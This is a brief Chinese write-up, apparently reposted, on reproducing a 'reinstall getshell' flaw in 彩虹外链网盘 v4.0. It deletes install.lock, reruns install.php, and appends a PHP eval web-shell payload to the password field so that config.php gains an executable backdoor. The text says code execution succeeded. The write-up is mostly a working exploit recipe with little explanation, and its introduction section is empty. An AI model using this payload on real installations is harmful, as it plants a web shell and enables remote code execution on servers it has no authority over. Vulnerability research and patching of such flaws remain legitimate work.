彩虹外链网盘_v4.0_重装getshell-棉花糖会员站

# 彩虹外链网盘 v4.0 重装getshell

==============================

一、漏洞简介
————

二、漏洞影响
————

彩虹外链网盘 v4.0

三、复现过程
————

在删除install.lock后,访问install.php
其他的原来的读取的配置,密码后面加上`’;@eval($_REQUEST[xx]);//`

![13.png](/static/qingy/彩虹外链网盘_v4.0_重装getshell/img/rId24.png){width=”5.833333333333333in”
height=”4.9203926071741035in”}

此时的config.php如下,而且由于我们用的是原来的配置,网站不会崩

![14.png](/static/qingy/彩虹外链网盘_v4.0_重装getshell/img/rId25.png){width=”5.833333333333333in”
height=”4.231375765529309in”}

代码执行成功

![15.png](/static/qingy/彩虹外链网盘_v4.0_重装getshell/img/rId26.png){width=”5.833333333333333in”
height=”1.143261154855643in”}

文章版权归作者所有，未经允许请勿转载。

THE END

彩虹外链网盘_v4.0_重装getshell